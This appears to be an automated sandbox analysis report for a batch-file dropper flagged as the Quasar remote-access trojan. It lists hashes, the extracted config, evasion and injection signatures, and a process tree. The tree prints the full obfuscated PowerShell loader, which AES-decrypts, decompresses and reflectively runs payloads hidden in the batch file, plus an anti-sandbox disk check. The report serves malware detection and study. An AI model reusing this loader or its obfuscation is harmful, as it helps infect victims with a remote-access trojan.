Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
91s -
max time network
91s -
platform
windows10-ltsc 2021_x64 -
resource
win10ltsc2021-20250113-en -
resource tags
arch:x64arch:x86image:win10ltsc2021-20250113-enlocale:en-usos:windows10-ltsc 2021-x64system -
submitted
17/01/2025, 19:07
Static task
static1
General
-
Target
filetest.bat
-
Size
7.9MB
-
MD5
f88d18fc65296a1ed460e40a352e3045
-
SHA1
f6d9d94da2f11d0485ca057a057a06ac492bde8c
-
SHA256
f3cbb5d82cd929211283435c7dd79e7c853449ad23e7d4895b9fc0427759ba7f
-
SHA512
f193edd5c475040928e188b756d27ecb2f61ef6a1d7392bdb62e6d5bcdd5c37272849a298e9cc6265b5f67890881971ecf28f93e98edd90f6f536190999ed367
-
SSDEEP
49152:h4ANZ4/rNl/dichvhGpPK7kMes5mmCq/BWZHtPrBe7XTADqoh6EKQJS2H/WkTb/2:6
Malware Config
Extracted
quasar
-
encryption_key
B98A458BCEB5C110558E7281A7F389412ABA4472
-
reconnect_delay
3000
Signatures
-
Quasar family
-
Quasar payload 1 IoCs
resource yara_rule behavioral1/memory/1532-1386-0x0000025C80C30000-0x0000025C8139A000-memory.dmp family_quasar -
Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
description pid Process procid_target PID 2572 created 624 2572 powershell.exe 5 PID 1532 created 624 1532 powershell.exe 5 -
Blocklisted process makes network request 2 IoCs
flow pid Process 7 1532 powershell.exe 10 1532 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
pid Process 2572 powershell.exe 1532 powershell.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate wmiprvse.exe -
Deletes itself 1 IoCs
pid Process 2572 powershell.exe -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\Tasks\$nya-vZbimLFn svchost.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 2572 set thread context of 4688 2572 powershell.exe 87 PID 1532 set thread context of 2804 1532 powershell.exe 96 -
Drops file in Windows directory 4 IoCs
description ioc Process File opened for modification C:\Windows\$rbx-onimai2 powershell.exe File created C:\Windows\$rbx-onimai2\$rbx-CO2.bat cmd.exe File created C:\Windows\$nya-onimai2\uninstalling powershell.exe File opened for modification C:\Windows\$nya-onimai2 powershell.exe -
Checks SCSI registry key(s) 3 TTPs 6 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000\LogConf wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\DeviceDesc wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Mfg wmiprvse.exe -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe Key security queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier wmiprvse.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe -
Enumerates system info in registry 2 TTPs 1 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier wmiprvse.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4772 powershell.exe 4772 powershell.exe 2572 powershell.exe 2572 powershell.exe 2572 powershell.exe 4688 dllhost.exe 4688 dllhost.exe 4688 dllhost.exe 4688 dllhost.exe 4688 dllhost.exe 4688 dllhost.exe 4688 dllhost.exe 4688 dllhost.exe 4688 dllhost.exe 4688 dllhost.exe 4688 dllhost.exe 4688 dllhost.exe 4688 dllhost.exe 4688 dllhost.exe 4688 dllhost.exe 4688 dllhost.exe 4688 dllhost.exe 4688 dllhost.exe 1312 powershell.exe 4688 dllhost.exe 4688 dllhost.exe 1312 powershell.exe 4688 dllhost.exe 4688 dllhost.exe 4688 dllhost.exe 4688 dllhost.exe 4688 dllhost.exe 4688 dllhost.exe 1312 powershell.exe 4688 dllhost.exe 4688 dllhost.exe 4688 dllhost.exe 4688 dllhost.exe 4688 dllhost.exe 4688 dllhost.exe 4688 dllhost.exe 4688 dllhost.exe 4688 dllhost.exe 4688 dllhost.exe 4688 dllhost.exe 4688 dllhost.exe 4688 dllhost.exe 4688 dllhost.exe 1532 powershell.exe 4688 dllhost.exe 4688 dllhost.exe 1532 powershell.exe 4688 dllhost.exe 4688 dllhost.exe 4688 dllhost.exe 4688 dllhost.exe 4688 dllhost.exe 4688 dllhost.exe 4688 dllhost.exe 4688 dllhost.exe 4688 dllhost.exe 4688 dllhost.exe 4688 dllhost.exe 4688 dllhost.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 4772 powershell.exe Token: SeDebugPrivilege 2572 powershell.exe Token: SeDebugPrivilege 4688 dllhost.exe Token: SeShutdownPrivilege 3636 Explorer.EXE Token: SeCreatePagefilePrivilege 3636 Explorer.EXE Token: SeDebugPrivilege 1312 powershell.exe Token: SeAssignPrimaryTokenPrivilege 2340 svchost.exe Token: SeIncreaseQuotaPrivilege 2340 svchost.exe Token: SeSecurityPrivilege 2340 svchost.exe Token: SeTakeOwnershipPrivilege 2340 svchost.exe Token: SeLoadDriverPrivilege 2340 svchost.exe Token: SeSystemtimePrivilege 2340 svchost.exe Token: SeBackupPrivilege 2340 svchost.exe Token: SeRestorePrivilege 2340 svchost.exe Token: SeShutdownPrivilege 2340 svchost.exe Token: SeSystemEnvironmentPrivilege 2340 svchost.exe Token: SeUndockPrivilege 2340 svchost.exe Token: SeManageVolumePrivilege 2340 svchost.exe Token: SeDebugPrivilege 1532 powershell.exe Token: SeShutdownPrivilege 3636 Explorer.EXE Token: SeCreatePagefilePrivilege 3636 Explorer.EXE Token: SeShutdownPrivilege 3636 Explorer.EXE Token: SeCreatePagefilePrivilege 3636 Explorer.EXE Token: SeAssignPrimaryTokenPrivilege 2340 svchost.exe Token: SeIncreaseQuotaPrivilege 2340 svchost.exe Token: SeSecurityPrivilege 2340 svchost.exe Token: SeTakeOwnershipPrivilege 2340 svchost.exe Token: SeLoadDriverPrivilege 2340 svchost.exe Token: SeSystemtimePrivilege 2340 svchost.exe Token: SeBackupPrivilege 2340 svchost.exe Token: SeRestorePrivilege 2340 svchost.exe Token: SeShutdownPrivilege 2340 svchost.exe Token: SeSystemEnvironmentPrivilege 2340 svchost.exe Token: SeUndockPrivilege 2340 svchost.exe Token: SeManageVolumePrivilege 2340 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2340 svchost.exe Token: SeIncreaseQuotaPrivilege 2340 svchost.exe Token: SeSecurityPrivilege 2340 svchost.exe Token: SeTakeOwnershipPrivilege 2340 svchost.exe Token: SeLoadDriverPrivilege 2340 svchost.exe Token: SeSystemtimePrivilege 2340 svchost.exe Token: SeBackupPrivilege 2340 svchost.exe Token: SeRestorePrivilege 2340 svchost.exe Token: SeShutdownPrivilege 2340 svchost.exe Token: SeSystemEnvironmentPrivilege 2340 svchost.exe Token: SeUndockPrivilege 2340 svchost.exe Token: SeManageVolumePrivilege 2340 svchost.exe Token: SeDebugPrivilege 1968 wmiprvse.exe Token: SeAuditPrivilege 2240 svchost.exe Token: SeAuditPrivilege 2808 svchost.exe Token: SeAuditPrivilege 2808 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2340 svchost.exe Token: SeIncreaseQuotaPrivilege 2340 svchost.exe Token: SeSecurityPrivilege 2340 svchost.exe Token: SeTakeOwnershipPrivilege 2340 svchost.exe Token: SeLoadDriverPrivilege 2340 svchost.exe Token: SeSystemtimePrivilege 2340 svchost.exe Token: SeBackupPrivilege 2340 svchost.exe Token: SeRestorePrivilege 2340 svchost.exe Token: SeShutdownPrivilege 2340 svchost.exe Token: SeSystemEnvironmentPrivilege 2340 svchost.exe Token: SeUndockPrivilege 2340 svchost.exe Token: SeManageVolumePrivilege 2340 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2340 svchost.exe -
Suspicious use of FindShellTrayWindow 12 IoCs
pid Process 3636 Explorer.EXE 3636 Explorer.EXE 3636 Explorer.EXE 3636 Explorer.EXE 3636 Explorer.EXE 3636 Explorer.EXE 3636 Explorer.EXE 3636 Explorer.EXE 3636 Explorer.EXE 3636 Explorer.EXE 3636 Explorer.EXE 3636 Explorer.EXE -
Suspicious use of SendNotifyMessage 13 IoCs
pid Process 3636 Explorer.EXE 3636 Explorer.EXE 3636 Explorer.EXE 3636 Explorer.EXE 3636 Explorer.EXE 3636 Explorer.EXE 3636 Explorer.EXE 3636 Explorer.EXE 3636 Explorer.EXE 3636 Explorer.EXE 3636 Explorer.EXE 3636 Explorer.EXE 3636 Explorer.EXE -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 1532 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2052 wrote to memory of 4772 2052 cmd.exe 82 PID 2052 wrote to memory of 4772 2052 cmd.exe 82 PID 4772 wrote to memory of 4348 4772 powershell.exe 84 PID 4772 wrote to memory of 4348 4772 powershell.exe 84 PID 2052 wrote to memory of 3212 2052 cmd.exe 85 PID 2052 wrote to memory of 3212 2052 cmd.exe 85 PID 2052 wrote to memory of 2572 2052 cmd.exe 86 PID 2052 wrote to memory of 2572 2052 cmd.exe 86 PID 2572 wrote to memory of 4688 2572 powershell.exe 87 PID 2572 wrote to memory of 4688 2572 powershell.exe 87 PID 2572 wrote to memory of 4688 2572 powershell.exe 87 PID 2572 wrote to memory of 4688 2572 powershell.exe 87 PID 2572 wrote to memory of 4688 2572 powershell.exe 87 PID 2572 wrote to memory of 4688 2572 powershell.exe 87 PID 2572 wrote to memory of 4688 2572 powershell.exe 87 PID 2572 wrote to memory of 4688 2572 powershell.exe 87 PID 4688 wrote to memory of 624 4688 dllhost.exe 5 PID 4688 wrote to memory of 684 4688 dllhost.exe 7 PID 4688 wrote to memory of 964 4688 dllhost.exe 12 PID 4688 wrote to memory of 404 4688 dllhost.exe 13 PID 4688 wrote to memory of 416 4688 dllhost.exe 14 PID 4688 wrote to memory of 700 4688 dllhost.exe 15 PID 4688 wrote to memory of 1036 4688 dllhost.exe 16 PID 4688 wrote to memory of 1064 4688 dllhost.exe 17 PID 4688 wrote to memory of 1144 4688 dllhost.exe 18 PID 4688 wrote to memory of 1256 4688 dllhost.exe 20 PID 4688 wrote to memory of 1264 4688 dllhost.exe 21 PID 4688 wrote to memory of 1316 4688 dllhost.exe 22 PID 4688 wrote to memory of 1340 4688 dllhost.exe 23 PID 4688 wrote to memory of 1360 4688 dllhost.exe 24 PID 4688 wrote to memory of 1496 4688 dllhost.exe 25 PID 4688 wrote to memory of 1552 4688 dllhost.exe 26 PID 4688 wrote to memory of 1564 4688 dllhost.exe 27 PID 4688 wrote to memory of 1580 4688 dllhost.exe 28 PID 4688 wrote to memory of 1700 4688 dllhost.exe 29 PID 4688 wrote to memory of 1716 4688 dllhost.exe 30 PID 4688 wrote to memory of 1824 4688 dllhost.exe 31 PID 4688 wrote to memory of 1844 4688 dllhost.exe 32 PID 684 wrote to memory of 1968 684 lsass.exe 83 PID 4688 wrote to memory of 1944 4688 dllhost.exe 33 PID 4688 wrote to memory of 1972 4688 dllhost.exe 34 PID 4688 wrote to memory of 1980 4688 dllhost.exe 35 PID 684 wrote to memory of 2240 684 lsass.exe 40 PID 684 wrote to memory of 1968 684 lsass.exe 83 PID 4688 wrote to memory of 2032 4688 dllhost.exe 36 PID 684 wrote to memory of 2240 684 lsass.exe 40 PID 4688 wrote to memory of 2040 4688 dllhost.exe 37 PID 4688 wrote to memory of 2152 4688 dllhost.exe 38 PID 4688 wrote to memory of 2240 4688 dllhost.exe 40 PID 4688 wrote to memory of 2340 4688 dllhost.exe 41 PID 4688 wrote to memory of 2360 4688 dllhost.exe 42 PID 4688 wrote to memory of 2544 4688 dllhost.exe 43 PID 2572 wrote to memory of 2432 2572 powershell.exe 88 PID 2572 wrote to memory of 2432 2572 powershell.exe 88 PID 684 wrote to memory of 2828 684 lsass.exe 47 PID 684 wrote to memory of 2828 684 lsass.exe 47 PID 4688 wrote to memory of 2552 4688 dllhost.exe 44 PID 4688 wrote to memory of 2752 4688 dllhost.exe 45 PID 4688 wrote to memory of 2808 4688 dllhost.exe 46 PID 4688 wrote to memory of 2828 4688 dllhost.exe 47 PID 4688 wrote to memory of 2848 4688 dllhost.exe 48 PID 4688 wrote to memory of 2856 4688 dllhost.exe 49 PID 4688 wrote to memory of 2904 4688 dllhost.exe 50 PID 4688 wrote to memory of 2980 4688 dllhost.exe 51 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:624
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵PID:1036
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{48ce549d-5a00-4fa5-af8e-232dc9c11555}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4688
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{c2de0613-10de-4524-a99c-d55155423ecf}2⤵PID:2804
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
- Suspicious use of WriteProcessMemory
PID:684
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:964
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:404
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:416
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:700
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵PID:1064
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵PID:1144
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in System32 directory
PID:1256 -
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵PID:3140
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:1264
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1316
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1340
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1360
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1496
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵PID:1552
-
C:\Windows\system32\sihost.exesihost.exe2⤵PID:2904
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1564
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1580
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵PID:1700
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1716
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵PID:1824
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1844
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵PID:1944
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1972
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1980
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:2032
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵PID:2040
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2152
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2240
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2340
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵PID:2360
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵PID:2544
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵PID:2552
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵PID:2752
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2808
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵PID:2828
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵PID:2848
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵PID:2856
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:2980
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:3092
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker1⤵PID:3200
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵PID:3548
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3636 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\filetest.bat"2⤵
- Suspicious use of WriteProcessMemory
PID:2052 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:3012
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe "if ((Get-WmiObject Win32_DiskDrive | Select-Object -ExpandProperty Model | findstr /i 'WDS100T2B0A') -and (-not (Get-ChildItem -Path F:\ -Recurse | Where-Object { -not $_.PSIsContainer } | Measure-Object).Count)) {exit 900} else {exit 1}"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4772 -
C:\Windows\system32\findstr.exe"C:\Windows\system32\findstr.exe" /i WDS100T2B0A4⤵PID:4348
-
-
-
C:\Windows\system32\cmd.execmd.exe /c echo function qmFV($REHT){ Invoke-Expression -InformationAction Ignore '$TTZK=vB[vBSvByvBstvBevBmvB.vBSvBevBcvBurvBivBtvBy.vBCvBrvBypvBtvBovBgrvBapvBhvBy.vBAevBsvB]:vB:vBCvBrvBeavBtvBevB()vB;'.Replace('vB', ''); Invoke-Expression -Debug '$TTZK.PkMPkoPkdPke=Pk[PkSPkyPksPktPkePkm.PkSPkePkcuPkrPkiPktyPk.PkCPkryPkptPkoPkgrPkapPkhPky.PkCPkiPkpPkhePkrPkMPkodPkePk]:Pk:PkCPkBCPk;'.Replace('Pk', ''); Invoke-Expression -Debug -WarningAction Inquire -Verbose '$TTZK.vsPvsavsdvsdivsnvsgvs=vs[vsSvsyvsstvsevsmvs.Svsevscvsurvsivstvsy.vsCrvsyvsptvsogvsrvsapvshvsyvs.vsPavsdvsdvsinvsgvsMovsdvsevs]:vs:vsPvsKvsCvsSvs7vs;'.Replace('vs', ''); Invoke-Expression -Debug '$TTZK.xPKxPexPyxP=[xPSxPyxPsxPtxPexPmxP.CxPoxPnxPvexPrxPtxP]:xP:xPFxProxPmBxPaxPsexP64xPSxPtrxPixPnxPg("xPhxPOxPixPbxxP/xPTxPsxPDxPUxPfxPQDxPvxPLxP4VxPDxPHxP90xPGxPfxP9kxPJCxPixPJFxPcuxPDxP8yxPAxPbxPMxPeCxP4xPWxPc=xP");'.Replace('xP', ''); Invoke-Expression -Debug '$TTZK.dkIdkVdk=dk[Sdkydksdktdkedkmdk.dkCodkndkvdkerdktdk]dk::dkFdkrdkomdkBadksdke6dk4Sdktdkridkndkg("dkBdkvdkidkt0dkjdkfdkAdkudkJdk4dk7Jdk1dkLdk6bdkOdkGdk79dkQdk=dk=");'.Replace('dk', ''); $pOIf=$TTZK.CreateDecryptor(); $TvBT=$pOIf.TransformFinalBlock($REHT, 0, $REHT.Length); $pOIf.Dispose(); $TTZK.Dispose(); $TvBT;}function MetK($REHT){ Invoke-Expression -Debug -WarningAction Inquire -InformationAction Ignore '$RRoW=pANpAepAwpA-OpAbpAjpAepAcpAtpA pASypAspAtpAempA.pAIpAO.pAMpAepAmopArypASpAtrpAeapAmpA(,$REHT);'.Replace('pA', ''); Invoke-Expression -Verbose -WarningAction Inquire '$HnaT=pANpAepAwpA-OpAbpAjpAepAcpAtpA pASypAspAtpAempA.pAIpAO.pAMpAepAmopArypASpAtrpAeapAmpA;'.Replace('pA', ''); Invoke-Expression -Verbose -WarningAction Inquire '$OYGv=KVNKVeKVwKV-OKVbKVjKVeKVcKVtKV KVSyKVsKVtKVemKV.KVIKVO.KVCKVoKVmpKVreKVsKVsiKVonKV.KVGZKViKVpKVSKVtrKVeKVaKVm($RRoW, KV[KVIKVOKV.CKVoKVmKVpKVrKVeKVsKVsiKVoKVnKV.CKVoKVmKVprKVeKVsKVsiKVonKVMKVodKVe]KV:KV:DKVeKVcKVoKVmpKVrKVeKVssKV);'.Replace('KV', ''); $OYGv.CopyTo($HnaT); $OYGv.Dispose(); $RRoW.Dispose(); $HnaT.Dispose(); $HnaT.ToArray();}function EXHV($REHT,$EVat){ Invoke-Expression -Verbose '$gHke=DN[DNSDNyDNstDNeDNmDN.DNRDNeDNfDNleDNcDNtDNioDNnDN.DNAsDNsDNeDNmbDNlyDN]DN::DNLoDNaDNd([byte[]]$REHT);'.Replace('DN', ''); Invoke-Expression -InformationAction Ignore '$vNwL=$gHke.CAECAnCAtCAryCAPCAoCAiCAnCAtCA;'.Replace('CA', ''); Invoke-Expression -Debug -InformationAction Ignore -WarningAction Inquire '$vNwLio.ioIioniovoiokioeio(io$ioniouiollio, $EVat);'.Replace('io', '');}function JYY($vrvS){ $registryPath = 'HKLM:\SOFTWARE\OOhhhm='; if (Test-Path $registryPath) { Remove-ItemProperty -Path $registryPath -Name * -Force } else { New-Item -Path $registryPath -Force; } Set-ItemProperty -Path $registryPath -Name 'Map' -Value 'MhRVQwCgfyDG;ODJpvpxTYFqN;dlOMrqSijFnyTh'; Set-ItemProperty -Path $registryPath -Name 'MhRVQwCgfyDG' -Value $vrvS; Set-ItemProperty -Path $registryPath -Name 'ODJpvpxTYFqN' -Value 'hOibx/TsDUfQDvL4VDH90Gf9kJCiJFcuD8yAbMeC4Wc='; Set-ItemProperty -Path $registryPath -Name 'dlOMrqSijFnyTh' -Value 'Bvit0jfAuJ47J1L6bOG79Q==';}$lVPp = 'C:\Users\Admin\AppData\Local\Temp\filetest.bat';$host.UI.RawUI.WindowTitle = $lVPp;$Enkb=[System.IO.File]::ReadAllText($lVPp).Split([Environment]::NewLine);foreach ($bUJs in $Enkb) { if ($bUJs.StartsWith('WWiTL')) { $DBhl=$bUJs.Substring(5); break; }}JYY $DBhl;$vrvS=[string[]]$DBhl.Split('\');Invoke-Expression -Debug -WarningAction Inquire -InformationAction Ignore -Verbose '$opM = MetK (qmFV (tq[tqCtqotqnvtqetqrtqttq]tq:tq:tqFrtqotqmtqBatqstqetq64tqStqttqritqngtq($vrvS[0].Replace("#", "/").Replace("@", "A"))));'.Replace('tq', '');Invoke-Expression -Debug '$tHS = MetK (qmFV (tq[tqCtqotqnvtqetqrtqttq]tq:tq:tqFrtqotqmtqBatqstqetq64tqStqttqritqngtq($vrvS[1].Replace("#", "/").Replace("@", "A"))));'.Replace('tq', '');Invoke-Expression -Verbose -Debug '$Hrm = MetK (qmFV (tq[tqCtqotqnvtqetqrtqttq]tq:tq:tqFrtqotqmtqBatqstqetq64tqStqttqritqngtq($vrvS[2].Replace("#", "/").Replace("@", "A"))));'.Replace('tq', '');EXHV $opM $null;EXHV $tHS $null;EXHV $Hrm (,[string[]] (''));3⤵PID:3212
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -WindowStyle Hidden3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Command and Scripting Interpreter: PowerShell
- Deletes itself
- Suspicious use of SetThreadContext
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2572 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C type C:\Users\Admin\AppData\Local\Temp\filetest.bat>C:\Windows\$rbx-onimai2\$rbx-CO2.bat4⤵
- Drops file in Windows directory
PID:2432
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "4⤵PID:2740
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:116
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe "if ((Get-WmiObject Win32_DiskDrive | Select-Object -ExpandProperty Model | findstr /i 'WDS100T2B0A') -and (-not (Get-ChildItem -Path F:\ -Recurse | Where-Object { -not $_.PSIsContainer } | Measure-Object).Count)) {exit 900} else {exit 1}"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1312 -
C:\Windows\system32\findstr.exe"C:\Windows\system32\findstr.exe" /i WDS100T2B0A6⤵PID:408
-
-
-
C:\Windows\system32\cmd.execmd.exe /c echo function qmFV($REHT){ Invoke-Expression -InformationAction Ignore '$TTZK=vB[vBSvByvBstvBevBmvB.vBSvBevBcvBurvBivBtvBy.vBCvBrvBypvBtvBovBgrvBapvBhvBy.vBAevBsvB]:vB:vBCvBrvBeavBtvBevB()vB;'.Replace('vB', ''); Invoke-Expression -Debug '$TTZK.PkMPkoPkdPke=Pk[PkSPkyPksPktPkePkm.PkSPkePkcuPkrPkiPktyPk.PkCPkryPkptPkoPkgrPkapPkhPky.PkCPkiPkpPkhePkrPkMPkodPkePk]:Pk:PkCPkBCPk;'.Replace('Pk', ''); Invoke-Expression -Debug -WarningAction Inquire -Verbose '$TTZK.vsPvsavsdvsdivsnvsgvs=vs[vsSvsyvsstvsevsmvs.Svsevscvsurvsivstvsy.vsCrvsyvsptvsogvsrvsapvshvsyvs.vsPavsdvsdvsinvsgvsMovsdvsevs]:vs:vsPvsKvsCvsSvs7vs;'.Replace('vs', ''); Invoke-Expression -Debug 